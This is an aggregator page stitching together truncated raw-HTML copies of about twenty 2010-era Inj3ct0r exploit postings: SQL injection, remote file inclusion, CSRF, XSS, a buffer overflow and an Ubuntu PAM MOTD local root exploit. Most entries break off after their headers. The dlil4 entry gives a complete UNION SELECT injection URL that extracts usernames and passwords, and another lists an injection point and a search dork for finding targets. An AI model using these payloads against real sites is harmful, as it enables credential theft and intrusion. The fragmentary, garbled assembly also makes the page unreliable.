Information Security News and Exploits

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>EQdkp-Plus Gallery &lt; v2.1.2 Blind SQL Injection Vulnerabilty</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================================
EQdkp-Plus Gallery &lt; v2.1.2 Blind SQL Injection Vulnerabilty
============================================================
#!/bin/php
&lt;?php
/*
######################################################################
# _ _ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>yappa &lt;= 3.1.2 (yappa.php) RFI / Command Execution Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================================
yappa &lt;= 3.1.2 (yappa.php) RFI / Remote Command Execution Vulnerability
=======================================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PHP-Nuke &lt;= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=====================================================================
PHP-Nuke &lt;= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit
=====================================================================
# PHP-Nuke &lt;= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit
# Author: yawn
# Contact Me: http://www.unitx.net
# E-Mail: yawn@unitx.net
# Requirements: [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>PHP-Nuke &lt;= 8.1.0.3.5b Remote Command Execution Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=======================================================
PHP-Nuke &lt;= 8.1.0.3.5b Remote Command Execution Exploit
=======================================================
# PHP-Nuke &lt;= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 &amp; yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #0day@irc.iside.us | #Unit-X@irc.unitx.net
# You will remember, [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>My Kazaam Address &amp; Contact Organizer SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================================
My Kazaam Address &amp; Contact Organizer SQL Injection Vulnerability
=================================================================
Author : v3n0m
Site : http://yogyacarderlink.web.id/
Date [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>TheHostingTool v1.2.2 Multiple CSRF Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===================================================
TheHostingTool v1.2.2 Multiple CSRF Vulnerabilities
===================================================
&lt;!—
Title: TheHostingTool 1.2.2 Multiple CSRF Vulnerabilities
Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt;
Date: Mon 12 Jul 2010 01:19:52 PM EEST
[...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities
================================================
# Name: Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities
# Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt;
# Date: Sat 10 Jul 2010 08:05:44 PM EEST
# Vendor: http://elitecms.net/
# Download: http://elitecms.net/download.php?download=eliteCMS
-=[ CSRF PoC 1 - [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla Health &amp; Fitness Stats Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==========================================================
Joomla Health &amp; Fitness Stats Persistent XSS Vulnerability
==========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Joomla EasyBlog Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>============================================
Joomla EasyBlog Persistent XSS Vulnerability
============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Accomplease Leasing Software SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================================
Accomplease Leasing Software SQL Injection Vulnerability
========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Campsite CMS 3.4.0 Multiple CSRF Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================
Campsite CMS 3.4.0 Multiple CSRF Vulnerabilities
================================================
&lt;!—
Title: Campsite CMS 3.4.0 Multiple CSRF Vulnerabilities
Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt;
Date: Mon 12 Jul 2010 03:40:46 PM [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>GetSimple CMS v2.01 (XSS/CSRF) Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
GetSimple CMS v2.01 (XSS/CSRF) Vulnerabilities
==============================================
&lt;!—
Title: GetSimple CMS 2.01 Multiple Vulnerabilities (XSS/CSRF)
Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt;
Date: Mon 12 Jul 2010 12:11:45 PM EEST
[...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Koobi CMS (galid) Persistent XSS Multiple Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
Koobi CMS (galid) Persistent XSS Multiple Vulnerabilities
=========================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>dlil4 Remote SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>========================================
dlil4 Remote SQL Injection Vulnerability
========================================
———-[Information]———-
Title : dlil4 Remote SQL Injection Vulnerability
Author : Vahshatestan
Email : Vahshatestan@Gmail.com
Site : www.Vahshatestan.com
bl4ckl0rd – lord.private – turkm4hdi – lord kaelthas
———-[Script Info]———-
Download : http://www.mixarab.com/scripts/f3f3daleel.zip
———-[exploit Info]———-
1]~[Sql]
http://localhost/Path/go.php?id=-1+union+select+0,concat(username,0×3,password),2,3,4,5+from+user–
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-12]</pre><script type=’text/javascript’>var gaJsHost [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Koobi CMS (index.php) SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=================================================
Koobi CMS (index.php) SQL Injection Vulnerability
=================================================
# Exploit Title : Koobi CMS (index.php) SQL Injection Vulnerability
# Date : [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================
Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities
==============================================
&lt;!—
Title: Grafik CMS 1.1.2 Multiple CSRF Vulnerabilities
Author: 10n1z3d &lt;10n1z3d[at]w[dot]cn&gt;
Date: Mon 12 Jul 2010 07:07:22 PM [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>DotNetNuke 5 Event Calendar/Registration Sql Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================================
DotNetNuke 5 Event Calendar/Registration Sql Injection Vulnerability
====================================================================
# Author: Pokeng
# Software Link: http://www.snowcovered.com/snowcovered2/Default.aspx?tabid=242&amp;r=a57a69e25a&amp;PackageID=14743
# Version : 3.0
# Platform / Tested on: Win/Linux
# category: webapps/0day
# Code : http://[site]/calendar/detail.asp?iEve=[SQLI]
# Dork : Make Your Imagination [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Avant Browser Denial of Service</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================
Avant Browser Denial of Service
===============================
##########################################################&quot;
## Legion of Xtremers &amp; Hackers Garage
## (www.loxian.co.cc) (www.garage4hackers.com)
## [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>================================================================
Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC
================================================================
/*
– Title: Corel WordPerfect Office X5 15.0.0.357 (wpd) Remote Buffer Preoccupation PoC
– Vendor: Corel Corporation
– Product Web Page: [...]

<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Ubuntu PAM MOTD Local Root Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================
Ubuntu PAM MOTD Local Root Exploit
==================================
#!/bin/bash
#
# Exploit Title: Ubuntu PAM MOTD local root
# Date: July 9, 2010
# Author: Anonymous
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 9.10 (Karmic Koala), Ubuntu 10.04 [...]